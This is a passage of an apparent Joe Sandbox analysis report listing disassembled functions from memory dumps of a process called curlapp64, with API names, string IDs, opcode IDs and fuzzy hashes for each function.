                                                                                                                                • Instruction Fuzzy Hash: 2031EA62A0EAC665EB109F55A54027ABBA4EB09BF8F05A731DD7E437C5DE3CD042C300
                                                                                                                                Function 00007FF8BA24540F Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2176892206-0
                                                                                                                                • Opcode ID: 2f9797f193df45c7b481db100e60b08213b7a9fd0dceec7202bd5f9a0139cfb3
                                                                                                                                • Instruction ID: ff13a40666c1d9077adc3bc35793e2c8059acf8fed216fb1a63137a5944f63b9
                                                                                                                                • Opcode Fuzzy Hash: 2f9797f193df45c7b481db100e60b08213b7a9fd0dceec7202bd5f9a0139cfb3
                                                                                                                                • Instruction Fuzzy Hash: 97313C32A4864387EB648F2C944453937A2EB40FA9F500275CFAD46AD8DF3DEC55EB40
                                                                                                                                Function 00007FF8BA24542D Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2176892206-0
                                                                                                                                • Opcode ID: 720396027f9f8d3d3fe9203298fc25822f39fc1cda5f8523342ad4760ab4cd82
                                                                                                                                • Instruction ID: aebd8f12a19ad9ef7d9c1753df7332f5d1a117c022ef282009bcab35f5875941
                                                                                                                                • Opcode Fuzzy Hash: 720396027f9f8d3d3fe9203298fc25822f39fc1cda5f8523342ad4760ab4cd82
                                                                                                                                • Instruction Fuzzy Hash: B4313C32A0864387EB648F2C944453836A2EB44FA5F500275CFAD466D8DF3DEC55EB40
                                                                                                                                Function 00007FF8BA245436 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2176892206-0
                                                                                                                                • Opcode ID: 1912eb11bf130eae2e547b1970bca48ed8b19c29bdba1e8f34b65483a5501b4b
                                                                                                                                • Instruction ID: 9457c0a92f325870ecbc98ad0d7c6afb93d3b00ae3ba7d2367b628b787b731d9
                                                                                                                                • Opcode Fuzzy Hash: 1912eb11bf130eae2e547b1970bca48ed8b19c29bdba1e8f34b65483a5501b4b
                                                                                                                                • Instruction Fuzzy Hash: 67312D32A4864387EB648F2C944453937A2EB44FA9F500275CFAD466D8DF3DEC55EB40
                                                                                                                                Function 00007FF8BA24541B Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2176892206-0
                                                                                                                                • Opcode ID: 32d35d9c2b7723c51d5e857bb2684c78f39de99eb49c041b529360ad8ea2c01b
                                                                                                                                • Instruction ID: 3210907c7e8744657ce22ba583b839559644011fb5cb423ddfafa63d6a26d615
                                                                                                                                • Opcode Fuzzy Hash: 32d35d9c2b7723c51d5e857bb2684c78f39de99eb49c041b529360ad8ea2c01b
                                                                                                                                • Instruction Fuzzy Hash: B1312D32A4864387EB648F2C944453936A2EB44FA5F500275CFAD466D8DF3DEC95EB40
                                                                                                                                Function 00007FF8BA245424 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2176892206-0
                                                                                                                                • Opcode ID: 97701945fa51463ff841a60e4708a2e229ebd4a6426745053824441736b893ec
                                                                                                                                • Instruction ID: 7ab41cc8a9292b8e45c08ae7728f0a7fb2b122a890ec807740294a7b8635f0d4
                                                                                                                                • Opcode Fuzzy Hash: 97701945fa51463ff841a60e4708a2e229ebd4a6426745053824441736b893ec
                                                                                                                                • Instruction Fuzzy Hash: 8E314D32A0864387EB648F2C944453837A2EB44FA5F5002B5CFAD466D8DF3DEC55EB40
                                                                                                                                Function 00007FF8BA2453FA Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2176892206-0
                                                                                                                                • Opcode ID: 9b6a69f8b95f0554885621ad68fe9f6678c237784e7bd2486879536f7a702587
                                                                                                                                • Instruction ID: ffd7fd41e4b5285b2175478ed7782bbd620f77672ebd74e637069411e0e462a5
                                                                                                                                • Opcode Fuzzy Hash: 9b6a69f8b95f0554885621ad68fe9f6678c237784e7bd2486879536f7a702587
                                                                                                                                • Instruction Fuzzy Hash: 51314D32A4864386EB648F2C944453837A2FB54FA9F600275CFAD4A6D8DF3DEC55EB40
                                                                                                                                Function 00007FF8A9320A6E Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free
                                                                                                                                • String ID: %s%s$@$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
                                                                                                                                • API String ID: 1294909896-2859655526
                                                                                                                                • Opcode ID: c9855bddabc4a27cd9db9cb27dd5964cce61590c4f4873fbddeb9d07a878e6bf
                                                                                                                                • Instruction ID: ed831a889f348506e0245f9ff02e08830f7b87c94661fc4790e6819040581cd8
                                                                                                                                • Opcode Fuzzy Hash: c9855bddabc4a27cd9db9cb27dd5964cce61590c4f4873fbddeb9d07a878e6bf
                                                                                                                                • Instruction Fuzzy Hash: E1310E65A0EEC2A2EB54DF25D4542BA23B4FB55BC4F446036DA4E87792EF6CE4948300
                                                                                                                                Function 00007FF8A935AA25 Relevance: 7.5, APIs: 5, Instructions: 44stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$_strdupfreestrtoul
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2267039244-0
                                                                                                                                • Opcode ID: 72ad6bdcad7d051e807e98e932602b08ea7d993d8f80e8c610641ad4cadf0211
                                                                                                                                • Instruction ID: b1cd0673713395af2f479ad25da1864c787b1efd8fda98c1add93e3763b7355a
                                                                                                                                • Opcode Fuzzy Hash: 72ad6bdcad7d051e807e98e932602b08ea7d993d8f80e8c610641ad4cadf0211
                                                                                                                                • Instruction Fuzzy Hash: B7111C26A1EEC2AAE7619F25D8403796370FB48B95F44A031CA4EC7784DF3CE4599701
                                                                                                                                Function 00007FF6CABB8A10 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 339COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                • API String ID: 0-1866435925
                                                                                                                                • Opcode ID: a1a3ca7c02371a01c10e6f849ea0af1995ee6e458b9c550de0073c7ebd3068b2
                                                                                                                                • Instruction ID: 83f076744d20a4f9a38384e8eb461f2e0e6e1278bd6307153b25cd6a9103136d
                                                                                                                                • Opcode Fuzzy Hash: a1a3ca7c02371a01c10e6f849ea0af1995ee6e458b9c550de0073c7ebd3068b2
                                                                                                                                • Instruction Fuzzy Hash: BAE1A062F04A8184EB10CF65F4A82BD27A1FB46B89F4886B6CF8D53799DF79D490C340
                                                                                                                                Function 00007FF6CABD50B0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 337COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in char
                                                                                                                                • API String ID: 4097890229-960316848
                                                                                                                                • Opcode ID: b84e775726f4b3f185421aad267f8b541d740d499282f5fc334c3963074b3516
                                                                                                                                • Instruction ID: 652779dc387e4ef5d35db3e76e63b885516f6df2afa4a0bfdd953bd86d770abc
                                                                                                                                • Opcode Fuzzy Hash: b84e775726f4b3f185421aad267f8b541d740d499282f5fc334c3963074b3516
                                                                                                                                • Instruction Fuzzy Hash: 01E1C022E18B8185EB108F64E5603BC77A1FB4679AF504275DADE93B9DDF38D485CB00
                                                                                                                                Function 00007FF6CABD57B0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 334COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in char
                                                                                                                                • API String ID: 4097890229-960316848
                                                                                                                                • Opcode ID: 92fecec11b3016f46a25da3696202e1a6b4244d74e6a6b833baf1a1c5e042e48
                                                                                                                                • Instruction ID: f20bd7af29fffffa8c4b77dd744adfc90a73f04f98c55dc34360ed32ec33bc44
                                                                                                                                • Opcode Fuzzy Hash: 92fecec11b3016f46a25da3696202e1a6b4244d74e6a6b833baf1a1c5e042e48
                                                                                                                                • Instruction Fuzzy Hash: 0CE1ED22E18B8589EB108F68E5603EC77A0FB4679AF544276DADD93B99DF3CD481C700
                                                                                                                                Function 00007FF6CABD4C10 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 333COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in char
                                                                                                                                • API String ID: 4097890229-960316848
                                                                                                                                • Opcode ID: 642abfa4e70b61a345fa1ead2a5f12cd152ead6c6ab379cb8276fb84dc2855b7
                                                                                                                                • Instruction ID: 656d958f6de850faf1fd8cf05f75442d0992c02a97434c0c9f0d386df67f21ec
                                                                                                                                • Opcode Fuzzy Hash: 642abfa4e70b61a345fa1ead2a5f12cd152ead6c6ab379cb8276fb84dc2855b7
                                                                                                                                • Instruction Fuzzy Hash: B8E1B022E18B8189EB10CF68E4602FCB7A0FB46799F544275EADD97B99DF38D481C740
                                                                                                                                Function 00007FF6CABDFB90 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 333COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in wchar_t
                                                                                                                                • API String ID: 4097890229-1689078516
                                                                                                                                • Opcode ID: d88f58d57a1f148fc8d371a96d0914883b912c7364169ddcf05bc59badd46fb6
                                                                                                                                • Instruction ID: 9ad8376fce04d07eed581bfe703ac2509934450845c5ec220e9763016c0c1f30
                                                                                                                                • Opcode Fuzzy Hash: d88f58d57a1f148fc8d371a96d0914883b912c7364169ddcf05bc59badd46fb6
                                                                                                                                • Instruction Fuzzy Hash: 92E1AE22E1CA8589EB108F78F4603BC77A1FB86799F544275EADD83A99DF38D485C700
                                                                                                                                Function 00007FF6CABE0290 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in wchar_t
                                                                                                                                • API String ID: 4097890229-1689078516
                                                                                                                                • Opcode ID: 93437477c8b3d1394ab81a59920c2221b156100f249961f548b07673b113ded5
                                                                                                                                • Instruction ID: d40541251225374e0658b257c388eaec6e55b7409e93dd5925fabe81f9b2a6c4
                                                                                                                                • Opcode Fuzzy Hash: 93437477c8b3d1394ab81a59920c2221b156100f249961f548b07673b113ded5
                                                                                                                                • Instruction Fuzzy Hash: 97E1D022A18B8189EB108F68E4603BC77B0FB86795F5442B1EADD83A99DF3CD585C740
                                                                                                                                Function 00007FF6CABDF6F0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in wchar_t
                                                                                                                                • API String ID: 4097890229-1689078516
                                                                                                                                • Opcode ID: d0af5a609d9997239f8d9a87b93039108021b191f8e280f21d838fa9f4a6a997
                                                                                                                                • Instruction ID: a1951ef9ae20e4dd31e879372fb35c7d9d91497d637deb0783209f278d7ede5f
                                                                                                                                • Opcode Fuzzy Hash: d0af5a609d9997239f8d9a87b93039108021b191f8e280f21d838fa9f4a6a997
                                                                                                                                • Instruction Fuzzy Hash: 8FE1DE22E1CB8189EB108F78E4602BC7BA0FB46759F544272EADD97A99DF39D481C700
                                                                                                                                Function 00007FF6CABD3D70 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 314COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in char
                                                                                                                                • API String ID: 909987262-960316848
                                                                                                                                • Opcode ID: b826f5fc70d941490de0c33a654269020e6bfd13175bd841d71075ad1b901a1d
                                                                                                                                • Instruction ID: 48d066af96dc987e812e51d0a72fb99d374e3c8e2d961b684f62d7032781aab7
                                                                                                                                • Opcode Fuzzy Hash: b826f5fc70d941490de0c33a654269020e6bfd13175bd841d71075ad1b901a1d
                                                                                                                                • Instruction Fuzzy Hash: A3D1BF22E18B8585EB10CF64F4603BC6BA1FB86799F544276DADD83B9ADF38D485C700
                                                                                                                                Function 00007FF6CABFC23C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                • Opcode ID: aff3ea997d203e62a904ae556a1831be3f51b6e78a87114d2869fecf62ca5d3e
                                                                                                                                • Instruction ID: 55052b78add8b1905dd39af3e74af990f38ed477b50ea42fc4885482ddabf271
                                                                                                                                • Opcode Fuzzy Hash: aff3ea997d203e62a904ae556a1831be3f51b6e78a87114d2869fecf62ca5d3e
                                                                                                                                • Instruction Fuzzy Hash: C281C47ED4C20285F7A44F29B97027926A0EB137CAF5D50B9CA89D3684DF3DF5829701
                                                                                                                                Function 00007FF6CABE75F4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
